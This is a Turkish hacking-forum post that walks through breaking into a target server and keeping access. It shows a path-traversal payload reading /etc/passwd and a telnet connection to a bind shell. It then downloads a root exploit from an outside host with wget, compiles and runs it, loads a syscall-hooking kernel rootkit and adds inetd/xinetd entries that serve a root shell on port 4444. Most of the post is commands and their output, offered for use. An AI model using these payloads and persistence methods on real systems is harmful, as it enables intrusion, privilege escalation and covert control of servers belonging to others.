BackDoor ( Gizili Kapı )

MySouLNeedLove

New member
Katılım
9 Ara 2005
Mesajlar
825
Reaction score
0
Puanları
0
Yaş
37
Konum
Çalışıyorum
Merhaba Hackhell Ailesi.

Şimdi Sizlere Backdoor ( Gizli Kapılar ) Açıklayacagım.

Hackhell İçin Giden Saatler Olsun !

Hersey Hackhell İçin​



Backdoor Nedir :

Şimdi Goreceksiniz :=)

Kısa Bir Anlatım Yapayım :

Ornek :

system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00

Şimdi PhpXplorer Sistemlerdeki File Include Bu.

Bu Yontemle herhangi Bir Dosyayı Okuyabılırız Oyle degıl Mı ?

Yani Config Dosyası var Eger Config’in Anlamını Bilen Biri Ordaysa İlk Bakacagı yer Config Dosyasıdır.

Hemen Baktık :

#define port 60000
#define shell "/bin/sh"

execl(shell,shell,(char *)0);

AaAaAa Açık Port 60000

Hadi Başlayalım Bakalım :

Başlat/Çalıştır/cmd

telnet color=#0000ffhttp://www.hedefsite.com 60000

Bu Komutla Telnetten Hedefsiteye 60000.Porttan Baglandık.

Şimdi Sisteme Baglandık.

id İle Serverda ne Oldugumuza Bakalım :

id :

uid=501(nobOdy) gid=501(nobOdy) groups=501(nobOdy) <<<--normal kullanıcı modunda.

Şimdi Sistemde Root Olmak İçin Elimizden Geleni Yapıcaz.

uname -a ile Server Hakkında Bilgi Sahibi Olalım :

Linux Hedef Site 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown

cat /etc/redhat-release Komutu İle Server Surumunu Orenelım :

Mandrake Linux release 8.2 (Bluebird) for i586

Şimdi cd Komutuyla /tmp Klasorune Gıdecez.

cd /tmp

pwd Yazıp Hangı Klasorde Oldugumuzu Orenıyoruz.

pwd;

/tmp

/usr/bin/wget color=#800080http://siteadi.com/exploitklasoru/wild.c;

--00:58:43-- color=#800080http://siteadi.com/exploitklasoru/wild.c
=> `wild.c’
Connecting to exploit.sitesi:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,767 [text/plain]
0K ...... 100%
00:58:43 .....`wild.c’ saved [6767/6767]

Şimdi Is Komutuyla Oldugumuz Klasordekı Dosyalara Bakıyoruz.

Is :

wild.c ---> Sisteme download ettiğimiz Dosya.
rootkit
rootwild

Şimdi Exploiti Derleyelim :

/bin/gcc -o wild wild.c;
wild <<<--- Derlenmiş Hali
wild.c
rootkit
rootwild

Exploiti Çalıstırmaya Geldi Sıra.

./wild.c

[*] Wait ....
[*] Wait ......
[*] Connect [ By WiLdBoY ]
[*] Helal Sana

id;

uid=0(root) gid=0(root) groups=0(root)

:=)

Gerçekleştirebileceğimiz Backdoorlardan bazıları:

Belli süre zarfında içinde geçerli olacak Backdoor açma

Herhangi bir servis açma

Kernel Backdoor(ları)

Dosyaların içine gizlenilen Backdoor(lar)

Rootkitlerin yardımıyla kurulan Backdoor(lar)

Amacımız Sistem Kalabıldıgımız Kadar Kalmak.

Burda Buyuk Ziyafet Çekiyoruz :=)

Gitmek İstemeyiz Demi :=)

Portların Durumuna Bakalım :

nmap -p 1-10000 Backdoor.sistem

Starting nmap V. 2.54BETA30 ( www.site.com/klasor/ )

Interesting ports on arkakapili.sistem (xxx.xxx.xxx.xxx):

Port State Service

21/tcp open ftp

22/tcp open ssh

25/tcp open smtp

53/tcp open domain

80/tcp open http

110/tcp open pop-3

443/tcp open https

3306/tcp open mysql

6767/tcp open unknown ----> Port’a Baksen :=)

Baglanalım :

telnet www.hedefsite.com 6767

Trying xxx.xxx.xxx.xxx...

Connected to arkakapili.sistem (xxx.xxx.xxx.xxx).

Escape character is ’^]’.

offf Baglan be :=)

id Diyelim Bakalım :=)


id;

uid=0(root) gid=0(root) groups=0(root) Yonetıcı Allah rahmet Eglesın :=)

Sistemde Çalısan Uygulamalara Bakalım ps -aux Komutu İle:

ps -aux :

root 1 0.2 0.3 1412 504 ? S 01:37 0:04 init
root 2 0.0 0.0 0 0 ? SW 01:37 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW 01:37 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN 01:37 0:00 [ksoftirqd_CPU0]
root 5 0.0 0.0 0 0 ? SW 01:37 0:00 [kswapd]

SockStat İle Sistemin Kullandıgı Portalara Bakalım :

./sockstat

SocketStat v1.0 - A Socket Information Program
Pro User Process Local Address State
UDP root portmap[776] x.x.x.x:111 CLOSED
TCP root portmap[776] x.x.x.x:111 LISTEN
UDP root rpc.sta[842] x.x.x.x:1018 CLOSED
UDP root rpc.sta[842] x.x.x.x:1024 CLOSED
TCP root rpc.sta[842] x.x.x.x:1024 LISTEN
UDP named named[1018] x.x.x.x:1025 CLOSED
UDP named named[1018] x.x.x.x:53 CLOSED
TCP named named[1018] x.x.x.x:53 LISTEN

Yeni Port Açabiliriz.

Ama

Ben tasvir etmem Cunku Kolayca Tespit edilebiliyor.

Diğelim lsmod ;

Module Size Used by Tainted
kbdv 940 0 (unused)
nfsd 69536 8 (autoclean)

lockd 49344 1 (autoclean) [nfsd]

sunrpc 62964 1 (autoclean) [nfsd lockd]
...

ext3 62092 1

Misafir sistemde yönetici durumuna geçmiş, sistemi yeteri kadar incelemiş.

Böyle bir sistemi bir daha nerede bulurum düşüncesiyle sistemde yetkileri tekrar eline
almak icin gerçek yöneticinin düşünemeyeceği yollara başvurma ihtimalide vardır

Sistemde

açık portlar kapatılabilir, suid tipi dosyalarin bu özellikleri kaldırılabilir` düşüncesine
sahip bir saldırgan türüyle karşı karşıya kalınabilir.

bir .c kodunu sisteme aktaran kişi root yetkisiyle dosyayı
derlediğini düsünelim.

Örneğin :

#define MODULE
#define __KERNEL__
#include <syscall.h>
#include <asm/uaccess.h>
#include <linux/module.h>
#include <linux/modversions.h>
...
#define FILE_NAME "wild" <--- Sihirli kelimel
extern void *sys_call_table[];
/* system calls we will replace */
int (*orig_utime)(const char *filename, struct utimbuf *buf);
int (*orig_getuid32)();
int u;
....
sys_call_table[SYS_utime] = orig_utime;
sys_call_table[SYS_getuid32] = orig_getuid32;
}


gcc -c -O2 wild.c -I/lib/modules/`uname -r`/build/include

Şimdi ls -1 Komutuyla Nelar Ver Neler Yok Die Bakalım.

wild.c
wild.o

insmod wild.o ; Diyelim

Warning: loading wild.o will taint the kernel: no license.

lsmod Diyelim :

Module Size Used by Tainted
kbdv 908 0 (unused)

Canım Sıkılınca Gırerim :=)

ssh -l avicenna Backdoor.Sistem;

Şimdi Kernal Backdoor Sisteme Tekrar Baglanmasını Beklemektedir.Yonetıcılık Sertifikası Alıcagız :=)

ssh -l avicenna Backdoor.Sistem;

ffavicenna@Backdoor password:

Last login: Sunday March 14 05:30:34 2006 from siteadi.com[avicenna@Backdoor avicenna]#

Heheheheeheh :=)))

cat /etc/inetd.conf ;
...
echo 4444 stream tcp nowait root /bin/sh sh -i
...
cat /etc/xinetd.d/kendim;
...
protocol = tcp |
port = 4444 |
socket_type = stream |
wait = no |
user = root |
server = /bin/sh |---
server_args = -i |
...​



Yazan: MySoulNeedLove
 
Geri
Üst